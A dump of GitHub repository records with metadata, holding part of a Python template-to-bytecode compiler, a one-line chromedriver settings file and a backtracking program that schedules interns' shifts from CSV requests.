self.sequence.elements:\n            if isinstance(entry, ReplaceableBlock):\n                block_dict[entry.name] = 
entry.make_bytecode(symbol_table)\n\n for entry in self.template.elements:\n if isinstance(entry, ReplaceableBlock) \\\n and (entry.name in block_dict):\n inner += block_dict[entry.name]\n else:\n inner += entry.make_bytecode(symbol_table)\n\n return inner\n\n\nclass ReplaceableBlock:\n def __init__(self, name):\n self.name = name\n self.sequence = Sequence()\n\n def __eq__(self, other):\n if not isinstance(other, ReplaceableBlock):\n return False\n\n return (self.name == other.name) \\\n and (self.sequence == other.sequence)\n\n def make_bytecode(self, symbol_table):\n inner = []\n\n for entry in self.sequence.elements:\n inner += entry.make_bytecode(symbol_table)\n\n return inner\n\n\nclass VariableExpansion:\n \"\"\"A variable expansion takes the value of an expression and includes\n it in the template output.\n\n \"\"\"\n\n def __init__(self, variable_name):\n self.variable_name = variable_name\n\n def make_bytecode(self, symbol_table):\n code = [Instr(\"LOAD_CONST\", symbol_table[\"write_func\"]),\n Instr(\"LOAD_NAME\", \"_output\"),\n Instr(\"LOAD_NAME\", \"str\")]\n\n compiled_expr = compile(self.variable_name,\n filename=\"<none>\",\n mode=\"eval\")\n concrete_bytecode = ConcreteBytecode.from_code(compiled_expr)\n inner = concrete_bytecode.to_bytecode()\n\n # The compiler drops a return statement at the end of the\n # expression, which we want to strip off so that we can use\n # the result\n inner.pop()\n\n code += inner\n\n code += [Instr(\"CALL_FUNCTION\", 1),\n Instr(\"CALL_FUNCTION\", 2),\n Instr(\"POP_TOP\")]\n\n return code\n\n\nclass Literal:\n def __init__(self, contents):\n self.contents = contents\n\n def __eq__(self, other):\n if not isinstance(other, Literal):\n return False\n\n return other.contents == self.contents\n\n def __repr__(self):\n return \"<Literal %r>\" % self.contents\n\n def make_bytecode(self, symbol_table):\n return [Instr(\"LOAD_CONST\", symbol_table[\"write_func\"]),\n Instr(\"LOAD_NAME\", \"_output\"),\n Instr(\"LOAD_CONST\", self.contents),\n Instr(\"CALL_FUNCTION\", 2),\n Instr(\"POP_TOP\")]\n\n\nclass Execution:\n \"\"\"\n .. todo:: This doesn't really belong in this module. It's here\n because we're combining two different types: block parser\n output and code generation.\n\n \"\"\"\n def __init__(self, expression):\n self.expression = expression\n\n def __repr__(self):\n return \"<Execution: %r>\" % self.expression\n" } ]
17
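Taken together, the files in the record above form a pipeline: Compiler._get_chunks drives the block_parser state machine, Parser builds the tree, and code_generation emits bytecode. A short end-to-end sketch follows, using the calling convention shown in performance_test.py (context passed as keyword arguments) and assuming the pinned dependencies from requirements.txt; the template text itself is illustrative.

# End-to-end sketch of the Margate pipeline above. The API calls match
# compiler.py and performance_test.py; the template text is illustrative.
from margate.compiler import Compiler

compiler = Compiler()
render = compiler.compile(
    "Hello {{ name }}!\n"
    "{% for n in numbers %}next: {{ n }}\n{% endfor %}")

# The compiled result is a plain function returning the rendered string.
print(render(name="world", numbers=[1, 2, 3]))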
wangy1b/taobao_seckill
https://github.com/wangy1b/taobao_seckill
b81b961d89197da9a9ba8462a27dcabdc4fad8c6
efc1420230fbab96fb485c47e77d8d49cbbe54e7
6c7558ceed7120af99c1f8dc377ce59dc8b51f4f
refs/heads/master
2023-03-20T23:25:12.039665
2021-03-03T07:41:27
2021-03-03T07:41:27
344,042,601
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.7045454382896423, "avg_line_length": 16.799999237060547, "blob_id": "fb387f9e2cd84b3bc6f423383627003560677670", "content_id": "80aaff234ada5b657414ef707e19adbffc8e7210", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 46, "num_lines": 5, "path": "/seckill/settings.py", "repo_name": "wangy1b/taobao_seckill", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# encoding=utf-8\n\n\nDRIVER_DIR = \"C:\\\\Program\\\\chromedriver_win32\"" } ]
1
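The settings.py in the record above only pins DRIVER_DIR, the directory holding the chromedriver binary. As an illustration (not code from this repository), a seckill script would typically consume such a setting roughly as below; the Selenium 3 style executable_path argument and the chromedriver.exe filename are assumptions.

# Hypothetical consumer of DRIVER_DIR; not part of the repository.
# Assumes Selenium 3 (executable_path) and a Windows chromedriver.exe.
import os
from selenium import webdriver
from seckill.settings import DRIVER_DIR

driver = webdriver.Chrome(
    executable_path=os.path.join(DRIVER_DIR, "chromedriver.exe"))
driver.get("https://www.taobao.com")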
raphaellieber/schedule
https://github.com/raphaellieber/schedule
0ddc5ca8015f3f37f2a9c989c9e46642fca6b34a
57d291b391bff5c9d8dfce4aba6f94e09aca930b
32aba729aa0fdc7c79d948b9e80403f6cbc2e70c
refs/heads/main
2022-12-31T06:02:50.705058
2020-10-02T12:27:44
2020-10-02T12:27:44
300,601,184
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6375445127487183, "alphanum_fraction": 0.6409252882003784, "avg_line_length": 38.446044921875, "blob_id": "057079aeef6e7d0039818d81b55944cb4eb60774", "content_id": "8910bdb3ffb362ec1e4d53ddb7e956a9d957670d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5620, "license_type": "no_license", "max_line_length": 106, "num_lines": 139, "path": "/days.py", "repo_name": "raphaellieber/schedule", "src_encoding": "UTF-8", "text": "class Dates:\r\n def __init__(self, day, month, year, weekday, day_type, nr_positions, min_proficient, max_proficient):\r\n self.__day = day\r\n self.__month = month\r\n self.__year = year\r\n self.__weekday = weekday\r\n self.__day_type = day_type\r\n self.__nr_required_interns = nr_positions\r\n self.__nr_required_proficient_interns = min_proficient\r\n self.__nr_required_non_proficient_interns = nr_positions - max_proficient\r\n self.__nr_available_interns = 0\r\n self.__nr_available_proficient_interns = 0\r\n self.__nr_available_non_proficient_interns = 0\r\n self.__available_proficient_interns = []\r\n self.__available_non_proficient_interns = []\r\n self.__unavailable_proficient_interns = []\r\n self.__unavailable_non_proficient_interns = []\r\n self.__allocated_proficient_interns = []\r\n self.__allocated_non_proficient_interns = []\r\n self.__changes_to_other_dates = {}\r\n\r\n\r\n ################################# Get methods #################################\r\n def get_day(self):\r\n return self.__day\r\n\r\n def get_weekday(self):\r\n return self.__weekday\r\n\r\n def get_day_type(self):\r\n return self.__day_type\r\n\r\n def get_nr_required_interns(self):\r\n return self.__nr_required_interns\r\n\r\n def get_nr_required_proficient_interns(self):\r\n return self.__nr_required_proficient_interns\r\n\r\n def get_nr_required_non_proficient_interns(self):\r\n return self.__nr_required_non_proficient_interns\r\n\r\n def get_nr_available_interns(self):\r\n return self.__nr_available_interns\r\n\r\n def get_nr_available_proficient_interns(self):\r\n return self.__nr_available_proficient_interns\r\n\r\n def get_nr_available_non_proficient_interns(self):\r\n return self.__nr_available_non_proficient_interns\r\n\r\n def get_available_proficient_interns(self):\r\n return self.__available_proficient_interns\r\n\r\n def get_available_non_proficient_interns(self):\r\n return self.__available_non_proficient_interns\r\n\r\n def get_available_interns(self):\r\n return self.get_available_proficient_interns() + self.get_available_non_proficient_interns()\r\n\r\n def get_allocated_proficient_interns(self):\r\n return self.__allocated_proficient_interns\r\n\r\n def get_allocated_non_proficient_interns(self):\r\n return self.__allocated_non_proficient_interns\r\n\r\n def get_changes_to_other_dates(self):\r\n return self.__changes_to_other_dates\r\n\r\n def get_allocated_interns(self):\r\n return self.get_allocated_proficient_interns() + self.get_allocated_non_proficient_interns()\r\n\r\n def get_nr_allocated_interns(self):\r\n return len(self.get_allocated_interns())\r\n\r\n ################################# Change methods #################################\r\n def add_available_proficient_intern(self, intern):\r\n self.__available_proficient_interns.append(intern)\r\n self.__nr_available_interns += 1\r\n self.__nr_available_proficient_interns += 1\r\n\r\n def add_available_non_proficient_intern(self, intern):\r\n self.__available_non_proficient_interns.append(intern)\r\n self.__nr_available_interns 
+= 1\r\n self.__nr_available_non_proficient_interns += 1\r\n\r\n def remove_available_proficient_intern(self, intern):\r\n self.__available_proficient_interns.remove(intern)\r\n self.__nr_available_interns -= 1\r\n self.__nr_available_proficient_interns -= 1\r\n\r\n def remove_available_non_proficient_intern(self, intern):\r\n self.__available_non_proficient_interns.remove(intern)\r\n self.__nr_available_interns -= 1\r\n self.__nr_available_non_proficient_interns -= 1\r\n\r\n def make_unavailable_proficient_intern(self, intern):\r\n self.remove_available_proficient_intern(intern)\r\n self.__unavailable_proficient_interns.append(intern)\r\n\r\n def make_unavailable_non_proficient_intern(self, intern):\r\n self.remove_available_non_proficient_intern(intern)\r\n self.__unavailable_non_proficient_interns.append(intern)\r\n\r\n def make_available_proficient_intern(self, intern):\r\n self.add_available_proficient_intern(intern)\r\n self.__unavailable_proficient_interns.remove(intern)\r\n\r\n def make_available_non_proficient_intern(self, intern):\r\n self.add_available_non_proficient_intern(intern)\r\n self.__unavailable_non_proficient_interns.remove(intern)\r\n\r\n def allocate_proficient_intern(self, intern):\r\n self.__allocated_proficient_interns.append(intern)\r\n self.__nr_required_interns -= 1\r\n self.__nr_required_proficient_interns -= 1\r\n\r\n def allocate_non_proficient_intern(self, intern):\r\n self.__allocated_non_proficient_interns.append(intern)\r\n self.__nr_required_interns -= 1\r\n self.__nr_required_non_proficient_interns -= 1\r\n\r\n def remove_allocation_proficient_intern(self, intern):\r\n self.__allocated_proficient_interns.remove(intern)\r\n self.__nr_required_interns += 1\r\n self.__nr_required_proficient_interns += 1\r\n\r\n def remove_allocation_non_proficient_intern(self, intern):\r\n self.__allocated_non_proficient_interns.remove(intern)\r\n self.__nr_required_interns += 1\r\n self.__nr_required_non_proficient_interns += 1\r\n\r\n def record_changes(self, intern, days_list):\r\n self.__changes_to_other_dates.update({intern: days_list})\r\n\r\n def remove_changes(self, intern):\r\n del self.__changes_to_other_dates[intern]\r\n\r\n def is_weekend(self):\r\n return self.__day_type == 'Weekend'" }, { "alpha_fraction": 0.6317156553268433, "alphanum_fraction": 0.6382099390029907, "avg_line_length": 48.118343353271484, "blob_id": "002316460b53fc11b640c5f5a48aa24674e6da49", "content_id": "e7a8570c4c92b096c2b79ccc15658ed85b6a0207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16938, "license_type": "no_license", "max_line_length": 128, "num_lines": 338, "path": "/interns_schedule.py", "repo_name": "raphaellieber/schedule", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nfrom interns import *\r\nfrom days import *\r\nfrom tkinter import *\r\n\r\n################################### Constants ###################################\r\nNR_INTERNS_PER_DAY = 5\r\nNR_PROFICIENT_PER_DAY = [2, 3]\r\nNR_OF_WEEKEND_DAYS = [0, 5]\r\n\r\n\r\n################################### Initiation ###################################\r\ndef pos_dates(req_list, days_list):\r\n return [days_list[i] for i in range(len(req_list)) if req_list[i] != 'no']\r\n\r\n\r\ndef req_dates(req_list, days_list):\r\n return [days_list[i] for i in range(len(req_list)) if req_list[i] == 'required']\r\n\r\n\r\ndef mand_dates(req_list, days_list):\r\n return [days_list[i] for i in range(len(req_list)) if req_list[i] == 'mandatory']\r\n\r\n\r\ndef 
allocate_mandatory(list_of_interns):\r\n for intern in list_of_interns:\r\n for date in intern.get_mandatory_dates():\r\n if intern.get_proficiency():\r\n allocate_proficient_intern(date, intern)\r\n else:\r\n allocate_non_proficient_intern(date, intern)\r\n\r\n\r\ndef create_intern_list_for_each_day(list_of_interns):\r\n for intern in list_of_interns:\r\n if intern.get_proficiency():\r\n for date in intern.get_possible_dates():\r\n date.add_available_proficient_intern(intern)\r\n else:\r\n for date in intern.get_possible_dates():\r\n date.add_available_non_proficient_intern(intern)\r\n\r\n\r\n################################### Legality ###################################\r\ndef more_than_enough_proficient_interns(day, proficient_intern_index, non_proficient_intern_index):\r\n remaining_proficient_interns = day.get_nr_available_proficient_interns() - proficient_intern_index\r\n remaining_non_proficient_interns = day.get_nr_available_non_proficient_interns() - non_proficient_intern_index\r\n return remaining_proficient_interns > day.get_nr_required_proficient_interns() and \\\r\n remaining_proficient_interns + remaining_non_proficient_interns > day.get_nr_required_interns()\r\n\r\n\r\ndef more_than_enough_non_proficient_interns(day, proficient_intern_index, non_proficient_intern_index):\r\n remaining_proficient_interns = day.get_nr_available_proficient_interns() - proficient_intern_index\r\n remaining_non_proficient_interns = day.get_nr_available_non_proficient_interns() - non_proficient_intern_index\r\n return remaining_non_proficient_interns > day.get_nr_required_non_proficient_interns() and \\\r\n remaining_proficient_interns + remaining_non_proficient_interns > day.get_nr_required_interns()\r\n\r\n\r\ndef last_intern_in_group(intern_index, group_size):\r\n return intern_index == group_size - 1\r\n\r\ndef legal_to_adapt_future_days(future_potential_dates, days_to_adapt, intern):\r\n \"\"\"\r\n consider adding verification if there will remain enough available days for the intern.\r\n \"\"\"\r\n nr_to_allocate = intern.get_nr_asked() - intern.get_nr_allocated()\r\n nr_available_currently = len(future_potential_dates) + 1\r\n if nr_to_allocate > nr_available_currently:\r\n return False\r\n\r\n if intern.get_proficiency():\r\n for day in days_to_adapt:\r\n if not more_than_enough_proficient_interns(day, 0, 0):\r\n return False\r\n else:\r\n for day in days_to_adapt:\r\n if not more_than_enough_non_proficient_interns(day, 0, 0):\r\n return False\r\n return True\r\n\r\ndef weekends_allocation_legal(intern, remaining_days):\r\n if not intern.weekend_allocation_required():\r\n return True\r\n else:\r\n remaining_weekend_days = [day.get_day() for day in remaining_days if day.is_weekend()]\r\n nr_relevant_remaining_weekend_days = len(remaining_weekend_days) - amount_of_proximal_days(remaining_weekend_days)\r\n return intern.get_nr_required_weekend_days() <= nr_relevant_remaining_weekend_days\r\n\r\ndef amount_of_proximal_days(days_list):\r\n if len(days_list) <= 1:\r\n return 0\r\n if days_list[1] - days_list[0] == 1:\r\n return 1 + amount_of_proximal_days(days_list[1:])\r\n else:\r\n return 0 + amount_of_proximal_days(days_list[1:])\r\n\r\n################################### Scheduling - Regular functions ###################################\r\ndef allocate_proficient_intern(date, intern):\r\n intern.allocate(date)\r\n if date.is_weekend():\r\n intern.weekend_allocated()\r\n date.allocate_proficient_intern(intern)\r\n\r\n\r\ndef allocate_non_proficient_intern(date, intern):\r\n 
intern.allocate(date)\r\n if date.is_weekend():\r\n intern.weekend_allocated()\r\n date.allocate_non_proficient_intern(intern)\r\n\r\n\r\ndef remove_allocation(intern, date):\r\n intern.remove_last_allocation()\r\n if date.is_weekend():\r\n intern.removed_weekend_allocation()\r\n if intern.get_proficiency():\r\n date.remove_allocation_proficient_intern(intern)\r\n else:\r\n date.remove_allocation_non_proficient_intern(intern)\r\n\r\n\r\ndef adapt_more_than_1(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_2(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.append(day_index + 2)\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_3(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.extend([day_index + 2, day_index + 3])\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_7(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.extend([day_index + 2, day_index + 3])\r\n if days_list[day_index].get_weekday() in ['Wed', 'Thu']:\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n elif days_list[day_index].is_weekend() and not intern.weekend_allocation_permitted():\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n if days_list[day_index].get_weekday() == 'Sat':\r\n relevant_days_index_list.extend([index - 1 for index in range(day_index + 7, len(days_list), 7)])\r\n return [days_list[new_index] for new_index in relevant_days_index_list if\r\n intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef adapt_more_than_8(days_list, day_index, intern, relevant_days_index_list):\r\n if intern.get_nr_asked() == intern.get_nr_allocated():\r\n relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n else:\r\n relevant_days_index_list.extend([day_index + 2, day_index + 3])\r\n if days_list[day_index].get_weekday() in ['Wed', 'Thu']:\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n elif days_list[day_index].is_weekend() and not intern.weekend_allocation_permitted():\r\n relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n if days_list[day_index].get_weekday() == 'Fri':\r\n relevant_days_index_list.extend([index + 1 for index in range(day_index + 7, len(days_list), 7)])\r\n elif days_list[day_index].get_weekday() == 
\r\n\r\ndef adapt_more_than_8(days_list, day_index, intern, relevant_days_index_list):\r\n    if intern.get_nr_asked() == intern.get_nr_allocated():\r\n        relevant_days_index_list.extend([index for index in range(day_index + 2, len(days_list))])\r\n    else:\r\n        relevant_days_index_list.extend([day_index + 2, day_index + 3])\r\n        if days_list[day_index].get_weekday() in ['Wed', 'Thu']:\r\n            relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n        elif days_list[day_index].is_weekend() and not intern.weekend_allocation_permitted():\r\n            relevant_days_index_list.extend([index for index in range(day_index + 7, len(days_list), 7)])\r\n            if days_list[day_index].get_weekday() == 'Fri':\r\n                relevant_days_index_list.extend([index + 1 for index in range(day_index + 7, len(days_list), 7)])\r\n            elif days_list[day_index].get_weekday() == 'Sat':\r\n                relevant_days_index_list.extend([index - 1 for index in range(day_index + 7, len(days_list), 7)])\r\n    return [days_list[new_index] for new_index in relevant_days_index_list if\r\n            intern in days_list[new_index].get_available_interns()]\r\n\r\n\r\ndef future_days_to_adapt(days_list, day_index, intern):\r\n    relevant_days_index_list = [day_index + 1]\r\n    remaining_days = len(days_list) - day_index\r\n    # the weekly variants are currently disabled:\r\n    # if remaining_days > 8:\r\n    #     return adapt_more_than_8(days_list, day_index, intern, relevant_days_index_list)\r\n    # elif remaining_days > 7:\r\n    #     return adapt_more_than_7(days_list, day_index, intern, relevant_days_index_list)\r\n    if remaining_days > 3:\r\n        return adapt_more_than_3(days_list, day_index, intern, relevant_days_index_list)\r\n    elif remaining_days > 2:\r\n        return adapt_more_than_2(days_list, day_index, intern, relevant_days_index_list)\r\n    elif remaining_days > 1:\r\n        return adapt_more_than_1(days_list, day_index, intern, relevant_days_index_list)\r\n    return []\r\n\r\n\r\ndef adapt_future_days(current_day, future_days_list, intern):\r\n    if intern.get_proficiency():\r\n        for day in future_days_list:\r\n            day.make_unavailable_proficient_intern(intern)\r\n    else:\r\n        for day in future_days_list:\r\n            day.make_unavailable_non_proficient_intern(intern)\r\n    current_day.record_changes(intern, future_days_list)\r\n\r\n\r\ndef undo_future_adaptations(current_day, intern):\r\n    days_list = current_day.get_changes_to_other_dates()[intern]\r\n    if intern.get_proficiency():\r\n        for day in days_list:\r\n            day.make_available_proficient_intern(intern)\r\n    else:\r\n        for day in days_list:\r\n            day.make_available_non_proficient_intern(intern)\r\n    current_day.remove_changes(intern)\r\n\r\n\r\n################################### Scheduling - Recursive functions ###################################\r\ndef schedule(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions):\r\n    if len(solutions) == 1:\r\n        return  # stop the search as soon as one complete schedule has been found\r\n\r\n    if day_index == len(list_of_days):\r\n        solutions.append(create_df_sched(list_of_days))\r\n        return\r\n\r\n    if list_of_days[day_index].get_nr_required_interns() == 0:\r\n        schedule(list_of_days, day_index + 1, 0, 0, solutions)\r\n\r\n    else:\r\n        if list_of_days[day_index].get_nr_required_proficient_interns() > 0:\r\n            schedule_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions)\r\n\r\n        elif list_of_days[day_index].get_nr_required_non_proficient_interns() > 0:\r\n            schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions)\r\n\r\n        else:\r\n            if list_of_days[day_index].get_nr_available_proficient_interns() - proficient_intern_index > 0:\r\n                schedule_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index,\r\n                                    solutions)\r\n            if list_of_days[day_index].get_nr_available_non_proficient_interns() - non_proficient_intern_index > 0:\r\n                schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index,\r\n                                        solutions)\r\n    return\r\n
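\r\n\r\n# Added note (hedged sketch, shown as a comment only): the two helpers below follow the\r\n# classic backtracking pattern --\r\n#\r\n#     allocate_proficient_intern(current_day, intern)        # choose\r\n#     adapt_future_days(current_day, affected_days, intern)  # propagate constraints\r\n#     schedule(...)                                          # recurse\r\n#     undo_future_adaptations(current_day, intern)           # un-propagate\r\n#     remove_allocation(intern, current_day)                 # un-choose\r\n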
\r\n\r\ndef schedule_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions):\r\n    current_day = list_of_days[day_index]\r\n    intern = current_day.get_available_proficient_interns()[proficient_intern_index]\r\n    future_potential_days = [list_of_days[index] for index in range(day_index, len(list_of_days)) if\r\n                             intern in list_of_days[index].get_available_proficient_interns()]\r\n    affected_days = future_days_to_adapt(list_of_days, day_index, intern)\r\n    # if legal_to_adapt_future_days(affected_days, intern) and weekends_allocation_legal(intern, [current_day] + affected_days):\r\n    if legal_to_adapt_future_days(future_potential_days, affected_days, intern):\r\n        allocate_proficient_intern(current_day, intern)\r\n        adapt_future_days(current_day, affected_days, intern)\r\n        schedule(list_of_days, day_index, proficient_intern_index + 1, non_proficient_intern_index, solutions)\r\n        undo_future_adaptations(current_day, intern)\r\n        remove_allocation(intern, current_day)\r\n    if more_than_enough_proficient_interns(current_day, proficient_intern_index, non_proficient_intern_index) and not \\\r\n            last_intern_in_group(proficient_intern_index, current_day.get_nr_available_proficient_interns()):\r\n        schedule_proficient(list_of_days, day_index, proficient_intern_index + 1, non_proficient_intern_index, solutions)\r\n    return\r\n\r\n\r\ndef schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index, solutions):\r\n    current_day = list_of_days[day_index]\r\n    intern = current_day.get_available_non_proficient_interns()[non_proficient_intern_index]\r\n    future_potential_days = [list_of_days[index] for index in range(day_index, len(list_of_days)) if\r\n                             intern in list_of_days[index].get_available_non_proficient_interns()]\r\n    affected_days = future_days_to_adapt(list_of_days, day_index, intern)\r\n    # if legal_to_adapt_future_days(affected_days, intern) and weekends_allocation_legal(intern, [current_day] + affected_days):\r\n    if legal_to_adapt_future_days(future_potential_days, affected_days, intern):\r\n        allocate_non_proficient_intern(current_day, intern)\r\n        adapt_future_days(current_day, affected_days, intern)\r\n        schedule(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index + 1, solutions)\r\n        undo_future_adaptations(current_day, intern)\r\n        remove_allocation(intern, current_day)\r\n    if more_than_enough_non_proficient_interns(current_day, proficient_intern_index, non_proficient_intern_index) and \\\r\n            not last_intern_in_group(non_proficient_intern_index, current_day.get_nr_available_non_proficient_interns()):\r\n        schedule_non_proficient(list_of_days, day_index, proficient_intern_index, non_proficient_intern_index + 1, solutions)\r\n    return\r\n\r\n\r\n################################### Export ###################################\r\ndef create_df_sched(list_of_days):\r\n    dates = [date.get_day() for date in list_of_days]\r\n    # note: assumes every day ends up with as many allocated interns as the first day\r\n    positions = [(i + 1) for i in range(list_of_days[0].get_nr_allocated_interns())]\r\n    return pd.DataFrame([[intern.get_name() for intern in day.get_allocated_interns()] for day in list_of_days], index=dates,\r\n                        columns=positions)\r\n\r\n\r\n################################### Main ###################################\r\ndf_cal = pd.read_csv(\"dates.csv\")\r\ndf_req = pd.read_csv(\"requests.csv\")\r\n\r\nlist_of_days = [Dates(row['Day'], row['Month'], row['Year'], row['Weekday'],\r\n                      row['Type'], NR_INTERNS_PER_DAY, NR_PROFICIENT_PER_DAY[0], NR_PROFICIENT_PER_DAY[1])\r\n                for index, row in df_cal.iterrows()]\r\nlist_of_interns = [Interns(row['name'], row['proficiency'], row['amount'], pos_dates(row[3:], list_of_days),\r\n                           req_dates(row[3:], list_of_days), mand_dates(row[3:], list_of_days), NR_OF_WEEKEND_DAYS)\r\n                   for index, row in df_req.iterrows()]\r\n\r\nallocate_mandatory(list_of_interns)\r\n\r\ncreate_intern_list_for_each_day(list_of_interns)\r\nsol = []\r\n
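\r\n\r\n# Added usage sketch (assumes dates.csv / requests.csv as loaded above): the solver can\r\n# also be run headless, without the Tk window built below, e.g.\r\n#\r\n#     schedule(list_of_days, 0, 0, 0, sol)\r\n#     if sol:\r\n#         sol[0].to_csv('schedule_out.csv')  # hypothetical output file name\r\n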
\r\n\r\nroot_sched = Tk()\r\nroot_sched.title('Schedule')\r\ncolumn_labels = ['Day', 'intern_01', 'intern_02', 'intern_03', 'intern_04', 'intern_05']\r\nfor i in range(len(column_labels)):\r\n    Label(root_sched, text=column_labels[i]).grid(row=1, column=i)  # .grid() returns None, so the result is not kept\r\nfor i in range(len(list_of_days)):\r\n    Label(root_sched, text=list_of_days[i].get_day()).grid(row=i + 2, column=0)\r\n    for j in range(len(list_of_days[i].get_allocated_interns())):\r\n        Label(root_sched, text=list_of_days[i].get_allocated_interns()[j].get_name()).grid(row=i + 2, column=j + 1)\r\n    # available_interns = list_of_days[i].get_available_interns()\r\n    # available_interns_str = available_interns[0].get_name()\r\n    # if len(available_interns) > 1:\r\n    #     for k in range(1, len(available_interns)):\r\n    #         available_interns_str += ', '\r\n    #         available_interns_str += available_interns[k].get_name()\r\n    # available_interns = Label(root_sched, text=available_interns_str).grid(row=i + 1, column=6)\r\n\r\n# NOTE: the button originally passed allocate_proficient_intern directly, which takes\r\n# (date, intern) arguments and would raise a TypeError when clicked; wiring it to the\r\n# solver instead is an assumed intent.\r\nmy_button = Button(root_sched, text='Allocate', command=lambda: schedule(list_of_days, 0, 0, 0, sol))\r\nmy_button.grid(row=0)\r\n\r\n\r\nroot_sched.mainloop()\r\nschedule(list_of_days, 0, 0, 0, sol)  # also runs after the window closes; a no-op if the button already found a solution\r\n\r\n\r\n# print(len(sol))\r\n# print(sol[0])" }, { "alpha_fraction": 0.5854895710945129, "alphanum_fraction": 0.5920852422714233, "avg_line_length": 27.893939971923828, "blob_id": "49e879aa1be1cbf68f2fdebf4b0a37a9ba6aceba", "content_id": "054aa18dccd74c79efb146c062f7b57bc9b26e0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1971, "license_type": "no_license", "max_line_length": 99, "num_lines": 66, "path": "/interns.py", "repo_name": "raphaellieber/schedule", "src_encoding": "UTF-8", "text": "class Interns:\r\n    def __init__(self, name, proficiency, nr_asked, pos_dates, req_dates, mand_dates, nr_weekends):\r\n        self.__name = name\r\n        self.__proficiency = proficiency\r\n        self.__nr_asked = nr_asked\r\n        self.__dates_possible = pos_dates\r\n        self.__dates_requested = req_dates\r\n        self.__dates_mandatory = mand_dates\r\n        self.__nr_required_weekends = nr_weekends[0]\r\n        self.__nr_permitted_weekends = nr_weekends[1]\r\n        self.__dates_allocated = []\r\n        self.__nr_allocated = 0\r\n        self.__available = True\r\n        self.__score = 0\r\n\r\n    def get_name(self):\r\n        return self.__name\r\n\r\n    def get_proficiency(self):\r\n        return self.__proficiency\r\n\r\n    def get_nr_asked(self):\r\n        return self.__nr_asked\r\n\r\n    def get_possible_dates(self):\r\n        return self.__dates_possible\r\n\r\n    def get_requested_dates(self):\r\n        return self.__dates_requested\r\n\r\n    def get_mandatory_dates(self):\r\n        return self.__dates_mandatory\r\n\r\n    def get_allocated_dates(self):\r\n        return self.__dates_allocated\r\n\r\n    def get_nr_required_weekend_days(self):\r\n        return self.__nr_required_weekends\r\n\r\n    def get_nr_allocated(self):\r\n        return self.__nr_allocated\r\n\r\n    def get_score(self):\r\n        return self.__score\r\n\r\n    def allocate(self, date):\r\n        self.__dates_allocated.append(date)\r\n        self.__nr_allocated += 1\r\n\r\n    def remove_last_allocation(self):\r\n        del self.__dates_allocated[-1]\r\n        self.__nr_allocated -= 1\r\n\r\n    def weekend_allocated(self):\r\n        self.__nr_required_weekends -= 1\r\n        self.__nr_permitted_weekends -= 1\r\n\r\n    def removed_weekend_allocation(self):\r\n        self.__nr_required_weekends += 1\r\n        self.__nr_permitted_weekends += 1\r\n\r\n    def weekend_allocation_required(self):\r\n        return self.__nr_required_weekends > 0\r\n\r\n    def weekend_allocation_permitted(self):\r\n        return 
self.__nr_permitted_weekends > 0" } ]
3